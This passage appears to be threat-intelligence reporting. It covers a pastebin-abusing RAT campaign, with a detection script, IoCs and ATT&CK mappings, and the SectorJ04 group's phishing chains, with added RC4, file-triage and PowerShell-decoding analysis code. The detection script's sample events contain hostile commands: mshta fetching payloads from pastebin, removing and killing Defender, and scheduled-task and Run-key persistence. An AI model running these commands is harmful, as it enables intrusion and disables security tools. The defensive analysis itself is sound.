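        if img == "taskkill.exe" and re.search(r"msascuil\.exe|mpcmdrun\.exe", cl, re.I):
            hits.append("taskkill_defender_process")
        if img == "msbuild.exe" and parent in SCRIPT_HOSTS:
            hits.append("msbuild_spawned_by_script_host")
    elif ev["EventID"] == 13:                    # registry value set
        run_key = re.search(r"\\CurrentVersion\\Run\\", ev["TargetObject"], re.I)
        if run_key and "mshta" in ev["Details"].lower():
            hits.append("run_key_points_at_mshta")
    return hits


def scan(events):
    """(event index, rule name) for every hit across a batch of events."""
    return [(i, h) for i, ev in enumerate(events) for h in rules_for(ev)]


SAMPLE_EVENTS = [  # constructed records mirroring the attack flow above
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "CommandLine": "mshta.exe http://www.pastebin.com/raw/8uJavttD"},
    {"EventID": 1, "Image": r"C:\Program Files\Windows Defender\MpCmdRun.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "MpCmdRun.exe -removedefinitions -dynamicsignatures"},
    {"EventID": 1, "Image": r"C:\Windows\System32\taskkill.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "taskkill /f /im MSASCuiL.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": 'schtasks /create /sc MINUTE /mo 30 /tn "Avast Updater" '
                    '/tr "mshta.exe http://pastebin.com/raw/qZXnhtQG" /F'},
    {"EventID": 13,
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\WinUpdate",
     "Details": "mshta.exe http://pastebin.com/raw/2gY9SAwU"},
    {"EventID": 1, "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "MSBuild.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",   # benign control
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for idx, rule in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

The first rule is the cheapest and the most specific to this actor; the parent/child rules (Office spawning mshta.exe, a script host spawning MSBuild.exe) are the ones that keep firing after the actor rotates pastes or moves to another hosting service.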

Indicators of Compromise (IoCs)

Malicious Documents (SHA-256)

b4fdff7dbed8724bde2c097285ce5842373a3d5087f0d492479e62b48e3e5e2d
c763340ae4acecd3e7d85b118bbad6bb4b1d433a6398571afd4c2c27a304ab4e
e83304a5ae3e6ef366858c48aa8706d8e088aba86c724d575b4ad2e0ebaea7cd
d757406ae30d7822ebe63c28ff09ac7b1eca1a0e37e6f706c442f4f7517a624b
399b7823b707ac07c65940a30e85bdf5c0c7ed1bba5b5034ebcf189937636a44

RevengeRAT (SHA-256)

CF6293824C97C45680CF999955FD48801856B424DC6E3CEAC6D5E36BB4092856

NanoCore (SHA-256)

94B7C5C65637D33F031F1173A68C1D008DD948B6CCBAE42682F82A56D3CF6197
E841F0008D9DA41CD815F75657D305DD69FC169C64FA283BF62DECD02B3D931E

Code Injectors (SHA-256)

84833991F1705A01A11149C9D037C8379A9C2D463DC30A2FEC27BFA52D218FA6
E22D550423F05EB685AD060A71D58B306E31C473D2D0CACF5794EC424FD3F393

C2 Domains

ontothenextone[.]duckdns[.]org
haggapaggawagga[.]duckdns[.]org
attilabanks[.]ddns[.]net
yakka[.]duckdns[.]org

Abused Legitimate Services

bitly[.]com/aswoesx2yxwxxd
bitly[.]com/adsodeasda
bitly[.]com/uiQSQWSQWSNnase
bitly[.]com/aswoeosXxxwxhh
xaasxasxasx[.]blogspot[.]com/p/kudi[.]html
xasjow21d[.]blogspot[.]com/p/14[.]html
axxwnxiaxs[.]blogspot[.]com/p/13[.]html
pastebin[.]com/raw/wZSPpxaG
pastebin[.]com/raw/2gY9SAwU
pastebin[.]com/raw/qZXnhtQG
pastebin[.]com/raw/Htp0LKHg
pastebin[.]com/raw/13AGuyHY
pastebin[.]com/raw/0e5uVXL0
pastebin[.]com/raw/8uJavttD
pastebin[.]com/raw/7EdEuebH
pastebin[.]com/raw/ri21rHbF
pastebin[.]com/raw/QppWFhGC
pastebin[.]com/raw/Q8g1d6Be
pastebin[.]com/raw/VpKuzs3R
pastebin[.]com/raw/kqm60tX5
pastebin[.]com/raw/3pEVfu9k
pastebin[.]com/raw/3VNZw83B
pastebin[.]com/raw/8Q050Drg
pastebin[.]com/raw/jX4MuzmX

MITRE ATT&CK Techniques

The following is a list of MITRE ATT&CK Techniques we have observed based on our analysis of these and other related malware.

Initial Access

T1193 Spearphishing Attachment

Execution

T1059 Command-Line Interface
T1173 Dynamic Data Exchange
T1106 Execution through API
T1203 Exploitation for Client Execution
T1170 Mshta
T1086 PowerShell
T1053 Scheduled Task
T1064 Scripting
T1204 User Execution

Persistence

T1108 Redundant Access
T1060 Registry Run Keys / Startup Folder
T1053 Scheduled Task

Defense Evasion

T1140 Deobfuscate/Decode Files or Information
T1089 Disabling Security Tools
T1054 Indicator Blocking
T1202 Indirect Command Execution
T1112 Modify Registry
T1170 Mshta
T1045 Software Packing
T1055 Process Injection
T1064 Scripting
T1108 Redundant Access
T1102 Web Service

Credential Access

T1056 Input Capture
T1081 Credentials in Files
T1241 Credentials in Registry

Discovery

T1016 System Network Configuration Discovery
T1033 System Owner/User Discovery
T1057 Process Discovery
T1063 Security Software Discovery
T1082 System Information Discovery
T1083 File and Directory Discovery

Collection

T1056 Input Capture
T1123 Audio Capture
T1125 Video Capture

Command and Control

T1032 Standard Cryptographic Protocol
T1065 Uncommonly Used Port
T1094 Custom Command and Control Protocol
T1105 Remote File Copy
T1132 Data Encoding

Exfiltration

T1022 Data Encrypted
T1041 Exfiltration Over Command and Control Channel

References

[1] The Daily Beast – FBI Arrests Hacker Who Hacked No One
https://www.thedailybeast.com/fbi-arrests-hacker-who-hacked-no-one

SectorJ04 Group’s Increased Activity in 2019

Abstract

SectorJ04 is a Russian-based cybercrime group that began operating about five years ago and conducted hacking activities for financial profit using malware such as banking trojans and ransomware against national and industrial sectors located across Europe, North America and West Africa.

In 2019, the SectorJ04 group expanded its hacking activities to cover various industrial sectors located across Southeast Asia and East Asia, and is changing the pattern of their attacks from targeted attacks to searching for random victims. This report includes details related to the major hacking targets of the SectorJ04 group in 2019, how those targets were hacked, characteristics of their hacking activities this year and recent cases of the SectorJ04 group’s hacking.

SectorJ04 group activity range and hacking methods

The SectorJ04 group has maintained the scope of its existing hacking activities while expanding to companies in various industrial sectors located in East Asia and Southeast Asia. There was a significant increase in their hacking activities in 2019, especially those targeting South Korea. They mainly use spam email to deliver a backdoor that receives additional commands from the attacker's server.

Main countries and sectors targeted

The SectorJ04 group's preexisting targets were financial institutions in North America and Europe, or general companies such as retailers and manufacturers, but they recently expanded to the medical, pharmaceutical, media, energy and manufacturing industries. They do not appear to place many restrictions on the sectors targeted. The following are the sectors and countries in which SectorJ04 group activity was found in 2019.

Figure 1 SectorJ04 group’s first half activity timeline in 2019

Targeted Countries

We saw SectorJ04 group activity in Germany, Indonesia, the United States, Taiwan, India, France, Serbia, Ecuador, Argentina, South Korea, Japan, China, the United Kingdom, South Africa, Italy, Hong Kong, Romania, Ukraine, Macedonia, Russia, Switzerland, Senegal, the Philippines, the UAE, Qatar, Saudi Arabia, Pakistan, Thailand, Bahrain, Turkey, Bulgaria and Bangladesh.

Figure 2 SectorJ04 group targeted countries

Targeted Industries

  • Financial-related corporate and government departments such as banks and exchanges
  • Retail business such as shopping malls and social commerce
  • Educational institutions such as universities
  • Manufacturing companies such as manufacturers of electronic products
  • Media companies such as broadcasting and media
  • Pharmaceutical and biotechnology-related companies
  • Job-search companies
  • Energy-related companies such as urban gas and wind power generation

Hacking Techniques

The SectorJ04 group mainly uses spear phishing emails with MS Word or Excel files attached; the document downloads a Microsoft Installer (MSI) file from the attacker's server and uses it to install a backdoor on the infected system. As anti-virus programs have recently begun to detect the MSI files, in some instances the macro in the malicious document installs the backdoor directly, without an MSI file.

Figure 3 Schematic drawing for SectorJ04 group’s hacking method

The malicious documents mainly use MS Office-related lure themes, and the same themes are often reused several times with only the language changed to match the victim's.

In addition, the backdoors delivered by the MSI files mostly carried valid digital signatures, and most of the malware was signed only days before it was found.

Figure 4 Part of the malicious document execution screen that the SectorJ04 group attaches to the spear phishing email
Figure 5 Part of the digital signature found in the executable used for hacking

Digital signature information found in malware

  • VAL TRADEMARK TWO LIMITED
  • ALLO LTD
  • COME AWAY FILMS LTD
  • AWAY PARTNERS LIMITED
  • ANG APPCONN LIMITED
  • START ARCHITECTURE LTD
  • SLON LTD
  • DIGITAL DR
  • FIT AND FLEX LIMITED
  • Dream Body Limited
  • BOOK A TEACHER LTD
  • MARK A EVANS LTD
  • WAL GRAY LTD
  • MISHA LONDON LTD
  • START ARCHITECTURE LT
  • BASS AUTOMOTIVE LIMITE
  • FILESWAP GLOBAL LT
  • HAB CLUB LT
  • ET HOMES LT

Main Malware Used

The SectorJ04 group mainly used their own backdoor, ServHelper and FlawedAmmy RAT, for hacking. They also used the Remote Manipulator System (RMS) RAT, a legitimate remote management software created in Russia. Backdoors are installed in infected systems and they also distributed email stealers, botnet malware and ransomware through those backdoors.

They were recently confirmed to use additional backdoors called AdroMut and FlowerPippi, which install other backdoors such as FlawedAmmy RAT in place of the MSI file, or collect system information and send it to the attacker's server.

Malware Types Found Before 2019

ServHelper
  Initial infection method: an MSI file downloaded by a document file attached to a spear phishing email
  Downloaded by MSI: Nullsoft Installer
  Characteristics: C2 responses use a specific separator

FlawedAmmy RAT
  Initial infection method: an MSI file downloaded by a document file attached to a spear phishing email
  Downloaded by MSI: encoded FlawedAmmy RAT
  Characteristics: checks for antivirus; registers autorun as "wsus.exe"

RMS RAT
  Initial infection method: an MSI file downloaded by a document file attached to a spear phishing email
  Downloaded by MSI: SFX file
  Characteristics: uses configuration files in DAT format

Malware Types Found After 2019

AdroMutFlowerPippi
Initial Infection MethodDocument files attached to the spear phishing emails
CharacteristicsInternal-used strings are decoded into AES-256-ECB mode after base64 decode.
Configure infection system information in JSON format (encrypted)
Load into “ComputerDefaults.exe” using DLL side loading technique
A simpler function than hard-coded RC4 key AdroMut

The backdoor installed on the infected system distributes additional botnet malware, ransomware and email stealers. The email stealer collects mail-server connection settings (SMTP, IMAP and POP3) and account credentials that the Outlook and Thunderbird mail clients store in the registry, and sends them to the attacker's server in a specific format.

Figure 6 Format to send email credentials collected by email stealer
Figure 7 Some of the email stealer codes that access email account information stored in the registry
Figure 8 Some of the email stealer codes that access email account information stored in the registry 2

The email stealer may also include a file collection routine that scans files with hard-coded extensions and harvests the email addresses recorded in their metadata. Finally, the malware creates and runs a batch file that deletes itself, removing its execution traces from the infected PC.

Figure 9 Some of the file extensions that the email stealer collects data from

The SectorJ04 group is believed to collect email accounts stored in infection systems for use in subsequent attacks.

Characteristics of hacking activities of SectorJ04 group in 2019

The following are the features of the first half of 2019 activities identified through the analysis of the SectorJ04 group’s hacking activities.

  • Increased hacking activities targeting East and Southeast Asia
  • Changes in spam email format and hacking methods
  • A shift in hacking targets from specific organizations and industries to a large number of indiscriminate ones

Although the SectorJ04 group mainly targeted countries located in Europe or North America, it has recently expanded its field of activities to countries located in Southeast Asia and East Asia. In particular, the frequency of hacking attacks targeting South Korea has increased, and spam emails targeting China were found in May.

Changes could also be seen in the attachments of the spam emails. Earlier spam emails carried malicious documents as attachments, but attachments with HTM and HTML extensions were also found, and the email body itself included links to download the malicious documents directly.

The SectorJ04 group’s initial spam emails had no mail content or only short sentences, but the latest spam emails found were elaborately written and included images. A new type of backdoor called AdroMut and a new malware called FlowerPippi was also found coming from SectorJ04.

Prior to 2019, the SectorJ04 group conducted large-scale hacking for financial gain, using exploit kits on websites to install ransomware such as Locky and GlobeImposter, along with its banking Trojan, on victims' computers. Since 2019 the group has changed its strategy to attacks by spam email. In particular, it uses a number of remote control malware to gain access to resources such as email accounts and system login credentials on the infected machine, which are then used to send more spam emails and distribute more malware.

Increased hacking activities targeting East and Southeast Asia

SectorJ04 group hacking activity targeting South Korea was found continuously throughout the first half of 2019. The emails found were written around invoices and tax accounting data, and had MS Word or Excel files with malicious macros attached. The malicious documents written in Korean share the MS Office theme seen in the group's activity in other languages.

Figure 10 Spear phishing emails disguised as order sheets

In June 2019, continuous hacking activities targeting South Korea were found again and spam emails were written with various contents, including transaction statements, receipts and remittance cards. During that period, a number of spam emails disguised as remittance cards of the same type were found.

Figure 11 Spear phishing email disguised as a remittance card

The SectorJ04 group has carried out large-scale hacking activities targeting South Korea, while also expanding its attacks to East and Southeast Asian countries such as Taiwan and the Philippines. Spam emails and attachments written in Chinese were found in May, at which time the SectorJ04 group targeted the electronics and telecommunications industries, international schools and manufacturing.

Figure 12 Spear phishing emails written in Chinese
Figure 13 Malicious excel file execution screen written in Chinese

Changes in spam email format and hacking methods

In June, SectorJ04 group conducted hacking using spam emails written in various languages, including English, Arabic, Korean and Italian, and the emails were written with various contents, including remittance card, invoice and tax invoice.

Along with the existing method of using MS Word or Excel files as attachments, they used HTML files to download malicious documents as attachments, or included links to download malicious documents directly in the text.

In the past, the emails used in attacks had little or no body text, but the latest ones are elaborately written and even include images.

Figure 14 Spear phishing email disguised as bank statement
Figure 15 Spear phishing email disguised as a hospital certificate

Changes have also been found in the SectorJ04 group's hacking methods. In addition to their existing backdoors, ServHelper and FlawedAmmy RAT, they have been confirmed to use two new backdoors, AdroMut and FlowerPippi.

AdroMut downloads the malware (ServHelper and FlawedAmmy RAT) used by the SectorJ04 group from the attacker server and simultaneously performs the functions of a backdoor.

FlowerPippi collects infection system information, such as the domain of the infected system, proxy settings, administrator rights, and OS version, and performs functions such as executing commands received, downloading and executing DLL and EXE files.

Figure 16 Encoded Strings on the AdroMut Backdoor
Figure 17 RC4 key with hard-coded view from the FlowerPippi back door
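The hard-coded RC4 key in FlowerPippi (Figure 17) means its strings can be recovered offline once the key is read out of the binary. The following is an added example, not the group's code nor code from the original post: a plain RC4 implementation, a decryptor for a table of hex-encoded strings, and a printable-text sanity check that catches a wrong key. The key and the strings are constructed for illustration; the real FlowerPippi key is not given on the page.

```python
from typing import List


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA followed by PRGA). The same call encrypts and decrypts."""
    if not key:
        raise ValueError("RC4 key must not be empty")
    s = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # pseudo-random generation, XORed into the data
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def printable_ratio(data: bytes) -> float:
    """Fraction of bytes that are printable ASCII; a cheap sanity check on the key."""
    if not data:
        return 0.0
    return sum(32 <= b < 127 or b in (9, 10, 13) for b in data) / len(data)


def decrypt_string_table(key: bytes, table: List[str], threshold: float = 0.9) -> List[str]:
    """Decrypt hex-encoded RC4 ciphertexts. A wrong key produces byte noise rather than
    text, so refuse any result that is not overwhelmingly printable."""
    out = []
    for hexblob in table:
        plain = rc4(key, bytes.fromhex(hexblob))
        if printable_ratio(plain) < threshold:
            raise ValueError(f"ciphertext {hexblob[:16]}... did not decrypt to text; wrong key?")
        out.append(plain.decode("ascii"))
    return out


# Constructed for illustration: neither the key nor the strings come from the FlowerPippi sample.
ASSUMED_KEY = b"example-hardcoded-key"
CONSTRUCTED_PLAINTEXTS = ["/gate.php", "Mozilla/5.0 (Windows NT 6.1)", "cmd.exe /c "]
CONSTRUCTED_TABLE = [rc4(ASSUMED_KEY, p.encode("ascii")).hex() for p in CONSTRUCTED_PLAINTEXTS]


def recover_strings() -> List[str]:
    """Decrypt the constructed table with the assumed key."""
    return decrypt_string_table(ASSUMED_KEY, CONSTRUCTED_TABLE)
```

In practice the key is carved from the binary (or read from the decompiler view in Figure 17) and the hex table is dumped from the .data section; the printable-ratio guard is what tells you whether you carved the right bytes.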

The SectorJ04 group is believed to have developed malware that works as a downloader, installing or downloading its other malware, to replace the MSI installation files it had used for more than six months, as security solutions increasingly detected those MSI files.

Figure 18 Some of the digital certificate information identified in the corresponding hacking activity

The SectorJ04 group, which had used the same infection pattern and the same malware for more than six months, appears to be changing its infection method (downloading malware directly from the malicious document without an MSI file), its spam email format, and the backdoors it uses.

Changes in hacking targets from specific organizations and industries to random ones

Until 2019, the SectorJ04 group carried out massive website-based hacking activities, mainly using ransomware and banking Trojans for financial profit. Since 2019 it has also been gathering attack resources such as email accounts and system login credentials from users.

This lets the group expand its range of targets for financially motivated attacks. In this regard, around February 2019 SectorJ04 was found to have broken into a company's internal network using a spear phishing email targeting executives and employees of certain South Korean companies.

They eventually compromised the Active Directory (AD) server, took control of the entire corporate network, and then distributed the Clop ransomware from the AD server. In the same activity we also found malware for collecting email information and "AmadeyBot", a botnet malware whose source code is available on Russian underground forums.

Figure 19 Spear phishing email used for hacking activities targeting AD servers in South Korea

They are believed to have continuously attempted to hack into South Korean companies to distribute Clop ransomware. In May, the attackers used spam emails disguised as being sent by the National Tax Service to install FlawedAmmy RAT, and the Clop ransomware found at that time was signed with the same certificate as the FlawedAmmy RAT executable. A shared code-signing certificate is a useful pivot: a signer name seen on one of the group's samples can be used to hunt for its other payloads.

Figure 20 Spear phishing email disguised as tax bill

The SectorJ04 group has shown a pattern of hacking activities that have changed from targeted attacks to a large-scale distribution of spam.

Major Malware Installation Types

The following describes three types of backdoor infections that are installed from malicious documents identified in the SectorJ04 group-related hacking cases that occurred during the first half of 2019.

Type 1 – Using encoded executable file

SectorJ04 group carried out intensive hacking on various industrial sectors, including South Korea’s media, manufacturing and universities, around February and March 2019. They used the spear phishing email to spread malicious Excel or malicious Word files, and downloaded the MSI files from the attacker’s server when the malicious documents were run.

The MSI file installs a downloader that fetches an encoded FlawedAmmy RAT from the attacker's server onto the infected system, and the downloaded FlawedAmmy RAT registers itself for automatic execution under the name "wsus.exe".

Figure 21 Type of backdoor installation to install encoded executable file Type 1

FlawedAmmy RAT performs remote control functions in the infected system and decodes encoded executable files downloaded from the attacker server using certain hard-coded strings. It also has a function to check if a particular process is running to determine whether their malware should be executed.

Figure 22 "Ammyy Admin" string found in FlawedAmmy RAT
Figure 23 Part of decode code that uses hard-coded strings

Type 2 – Using NSIS Script

The SectorJ04 group conducted hacking activities targeting financial institutions located in India and Hong Kong around April 2019. Malicious documents delivered by spear phishing email downloaded an MSI file, which drops an NSIS installer on the infected system. The NSIS script then runs the final payload, ServHelper, which is in DLL form, using "rundll32.exe".

Note that NSIS (Nullsoft Scriptable Install System) is a script-based installation system for Windows and is a lightweight installation system supported by Nullsoft.

Figure 24 Backdoor installation type utilizing NSIS Installer Type 2

Decompressing the NSIS installer dropped by the MSI file shows that it consists of an NSIS script with the .nsi extension, ServHelper in DLL form, and "nsExec.dll", the legitimate NSIS plugin the script uses to run external commands.

Figure 25 Uncompressed NSIS installer
Figure 26 Part of the NSIS script for running ServHelper in the DLL file format

ServHelper performs the function of the backdoor in the infection system and sends specific types of responses to C2 servers using delimiters such as “key,” “sysid,” and “resp”. Different types of delimiters are sometimes found depending on malware.

Figure 27 ServHelper Backdoor C2 Communication Code Partial

Type 3 – Using Self-Extracting File

The SectorJ04 group carried out hacking activities targeting financial institutions located in Italy and other countries around May 2019. Malicious documents delivered by spear phishing email drop an MSI file on the infected system, and the MSI file downloads a self-extracting executable (SFX). When the SFX file runs, a second SFX file inside it is executed, delivering the final payload, RMS RAT, to the infected system.

Figure 28 Backdoor installation type utilizing SFX executable files Type 3

The first SFX file downloaded by the MSI file contains four files. When it runs, a batch script ("i.cmd") renames the second SFX file, which is disguised as a DLL ("kernel.dll"), to an EXE extension and extracts it with a hard-coded password. The set of files inside the SFX varies from sample to sample.

Figure 29 The first SFX file to be downloaded from an MSI file
Figure 30 “i.cmd” for decompression of the second SFX file

The second SFX file, once extracted, also contains four files and, as before, runs "exit.exe". "exit.exe" executes the same "i.cmd" as before, which registers the RMS RAT under the file name "winserv.exe" in the registry and runs it. RMS RAT is a legitimate remote management tool developed in Russia, and the files with DAT extensions hold the configuration used to run it.

Figure 31 Configuring a second SFX file disguised as a DLL file extension
Figure 32 RMS RAT configuration file with a DAT extension

SectorJ04 Group Activity in South Korea

The following is about the activities of the SectorJ04 group found in South Korea in July and August 2019.

Hacking activities disguised as electronic tickets by large airlines

In late July, SectorJ04 group used FlawedAmmy RAT to carry out hacking attacks on companies and universities in sectors such as education, job openings, real estate and semiconductors in South Korea. Spam emails targeting email accounts used in the integrated mail service of public officials were also found in the hacking activity.

Figure 33 Spam email disguised as electronic tickets

They used spam emails disguised as those sent by large South Korean airlines and used ISO-format files as attachments. The group used the same body contents of the email to deliver spam emails to multiple hacking targets.

Extracting the ISO file attached to the spam email reveals an SCR file disguised with a ".pdf" extension in its name; it is a .NET executable that downloads an MSI file. Some ISO files instead contain LNK files which, like the .NET malware, download an MSI file from a remote location.

Figure 34 A disguised SCR file identified within an ISO file
Figure 35 MSI file downloader written as .NET
Figure 36 Disguised LNK file identified within ISO file
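The Type 3 chain above carries its second SFX as "kernel.dll", and the ISO attachments here carry a .NET executable named with a ".pdf" extension; in both cases the file name lies about the content. The following is an added example, not code from the original post, of a triage routine that identifies a file by its magic bytes, flags double extensions, content/extension mismatches and PE files with an appended RAR or ZIP archive (an SFX), and runs it over constructed stand-in files (not the real samples).

```python
import os
from typing import Dict, List, Tuple

# (magic bytes at offset 0, kind). SFX archives start with an MZ stub, so they
# show up as "pe" here and are caught separately by _embedded_archive().
MAGIC: List[Tuple[bytes, str]] = [
    (b"MZ", "pe"),                                 # EXE / DLL / SCR / SFX stub
    (b"PK\x03\x04", "zip"),                        # also docx/xlsx containers
    (b"Rar!\x1a\x07", "rar"),
    (b"L\x00\x00\x00\x01\x14\x02\x00", "lnk"),     # shell link header size + CLSID prefix
    (b"%PDF", "pdf"),
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "ole"),  # legacy .doc / .xls
]

# What the final extension promises the content to be.
EXPECTED_KIND = {
    "exe": "pe", "dll": "pe", "scr": "pe", "cpl": "pe",
    "zip": "zip", "docx": "zip", "xlsx": "zip",
    "rar": "rar", "lnk": "lnk", "pdf": "pdf", "doc": "ole", "xls": "ole", "iso": "iso",
}
EXECUTABLE_EXTS = {"exe", "dll", "scr", "cpl", "lnk", "com", "pif", "bat", "cmd", "js", "vbs", "hta"}
LURE_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "txt", "jpg", "png"}


def detect_kind(data: bytes) -> str:
    """Identify the container by content, ignoring the file name entirely."""
    if len(data) > 0x8006 and data[0x8001:0x8006] == b"CD001":
        return "iso"                               # ISO 9660 primary volume descriptor
    for magic, kind in MAGIC:
        if data.startswith(magic):
            return kind
    if data and all(32 <= b < 127 or b in (9, 10, 13) for b in data):
        return "text"
    return "unknown"


def _embedded_archive(data: bytes) -> str:
    """An MZ stub followed by a RAR or ZIP archive is a self-extracting archive."""
    if data.startswith(b"MZ"):
        if b"Rar!\x1a\x07" in data[2:]:
            return "rar-sfx"
        if b"PK\x03\x04" in data[2:]:
            return "zip-sfx"
    return ""


def triage(filename: str, data: bytes) -> Dict[str, object]:
    """Compare what the name claims with what the bytes are; collect reasons to distrust it."""
    parts = os.path.basename(filename).lower().split(".")
    exts = parts[1:] if len(parts) > 1 else []
    final_ext = exts[-1] if exts else ""
    kind = detect_kind(data)
    reasons: List[str] = []

    # 1. "ticket.pdf.scr": a document-looking name ending in an executable type.
    if final_ext in EXECUTABLE_EXTS and any(e in LURE_EXTS for e in exts[:-1]):
        reasons.append("double extension")
    # 2. Content disagrees with the extension ("notes.txt" that is really a PE).
    expected = EXPECTED_KIND.get(final_ext)
    if kind == "pe" and final_ext not in EXECUTABLE_EXTS:
        reasons.append(f"PE content with .{final_ext} extension")
    elif expected and kind != expected and kind != "unknown":
        reasons.append(f"content is {kind}, expected {expected}")
    # 3. "kernel.dll" that is really a password-protected SFX (Type 3 chain).
    sfx = _embedded_archive(data)
    if sfx:
        reasons.append(f"self-extracting archive ({sfx})")

    return {"file": filename, "kind": kind, "suspicious": bool(reasons), "reasons": reasons}


def constructed_samples() -> Dict[str, bytes]:
    """Constructed stand-ins for the files discussed above (not real malware)."""
    pe_stub = b"MZ" + b"\x00" * 62
    return {
        "kernel.dll": pe_stub + b"Rar!\x1a\x07\x00" + b"\x00" * 16,   # SFX disguised as a DLL
        "e-ticket.pdf.scr": pe_stub,                                   # downloader inside the ISO
        "e-ticket.pdf.lnk": b"L\x00\x00\x00\x01\x14\x02\x00" + b"\x00" * 16,
        "notes.txt": pe_stub,                                          # binary shipped as .txt
        "report.pdf": b"%PDF-1.4\n%constructed\n",
        "attachment.iso": b"\x00" * 0x8000 + b"\x01CD001\x01\x00",
    }


def scan(samples: Dict[str, bytes]) -> List[str]:
    """Names of the files the triage flagged."""
    return [name for name, data in samples.items() if triage(name, data)["suspicious"]]
```

The ISO itself is not flagged, only identified; in a real triage its members would be extracted and fed back through triage(), which is where the ".pdf.scr" and ".lnk" findings come from.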

The following valid digital signatures were found in the MSI file downloaded from the attacker server. Other digital signatures were also found issued by “HAB CLUB LT” and “LUK 4 TRANSPORT LT”.

Figure 37 Digital signature information for MSI files found in hacking activities

Finally, FlawedAmmy RAT is downloaded from the remote server, and the activity uses a Base64-encoded PowerShell script to determine whether the infected system is a PC joined to an Active Directory domain.

Figure 38 Powershell script to determine if a PC belongs to a domain
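The domain-membership check described above, as an added example that is neither the group's script nor code from the original post: decoding of the Base64/UTF-16LE payload behind PowerShell's -EncodedCommand, and a check of the decoded script for domain-discovery indicators, run over constructed process command lines. The post does not show the script's contents, so the cmdlets and environment variables matched here are assumptions about how such a check is typically written.

```python
import base64
import re
from typing import Dict, List, Optional

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENC_FLAG = re.compile(
    r"-(?:e|ec|en|enc|enco|encod|encode|encoded|encodedc|encodedco|encodedcom|"
    r"encodedcomm|encodedcomma|encodedcomman|encodedcommand)\s+([A-Za-z0-9+/=]{8,})",
    re.IGNORECASE,
)

# Cmdlets and properties commonly used to test domain membership. The post only states that
# the script checks for AD domain membership; these concrete patterns are assumptions.
DOMAIN_CHECK_PATTERNS = [
    "Win32_ComputerSystem", "PartOfDomain", "GetComputerDomain", "GetCurrentDomain",
    "USERDNSDOMAIN", "USERDOMAIN", "Get-ADDomain", "Get-ADComputer", "LOGONSERVER",
]


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the UTF-16LE script hidden behind -EncodedCommand, or None if absent/invalid."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):      # binascii.Error is a ValueError
        return None


def analyze(cmdline: str) -> Dict[str, object]:
    """Decode the command line (if encoded) and look for domain-membership checks."""
    decoded = decode_encoded_command(cmdline)
    script = decoded if decoded is not None else cmdline
    matched = [p for p in DOMAIN_CHECK_PATTERNS if p.lower() in script.lower()]
    return {
        "encoded": decoded is not None,
        "decoded": decoded,
        "domain_check": bool(matched),
        "matched": matched,
    }


def encode_for_powershell(script: str) -> str:
    """Produce the -EncodedCommand form of a script (used only to build samples)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed process-creation command lines; not taken from the incident.
DOMAIN_PROBE = ("$cs = Get-WmiObject Win32_ComputerSystem; "
                "if ($cs.PartOfDomain) { 'domain: ' + $cs.Domain } else { 'workgroup' }")
SAMPLE_LINES: List[str] = [
    "powershell.exe -NoP -W Hidden -enc " + encode_for_powershell(DOMAIN_PROBE),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    "powershell.exe -EncodedCommand " + encode_for_powershell("Get-Date"),
    "powershell.exe -e notbase64!!",
]


def scan(lines: List[str]) -> List[str]:
    """Command lines whose (decoded) script performs a domain-membership check."""
    return [ln for ln in lines if analyze(ln)["domain_check"]]
```

Command lines come from Windows event 4688 with command-line auditing enabled, or from Sysmon event 1; the decoder is worth running on every encoded invocation, since the same -enc wrapper hides the rest of the group's PowerShell as well.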

Hacking activity using same email content as the past

In early August, the SectorJ04 group carried out extensive hacking activities targeting the users around the world, including South Korea, India, Britain, the United States, Germany, Canada, Argentina, Bangladesh and Hong Kong.

Their activities were particularly heavy in healthcare-related areas such as healthcare, pharmaceuticals, biotechnology and healthcare-wage management, as well as energy-related companies such as gas and wind power. Also, they continued their attacks on preexisting hacking target areas such as manufacturing, distribution and retail.

The spam emails found had body text written in French and English, and an MS Word file with a random number in its name was used as the attachment. All emails found in this activity had the same body text.

Figure 39 Spear phishing emails written in French and English

Spam emails in Korean were also identified in this activity, reusing the body text of the emails used in June. The attached file is an MS Word file named "스캔_(random number).doc".

Figure 40 Spear phishing email targeted to South Korea using the same text used in the past

The MS Word attachment is disguised as an order confirmation or a goods receipt. Running the macro in the document launches a downloader in DLL form via "rundll32.exe". The downloader fetches FlawedAmmy RAT from the attacker's server and runs it under the name "rundl32.exe" (note the single "l": the name imitates the legitimate rundll32.exe, which lives in the Windows system directory, so a process with this name or running from a user-writable path is a strong indicator).

Figure 41 Malicious document execution screen disguised as order confirmation
Figure 42 Malicious document execution screen for Korea language users disguised as a receipt of goods
Figure 43 Part of the macro script included in the malicious document

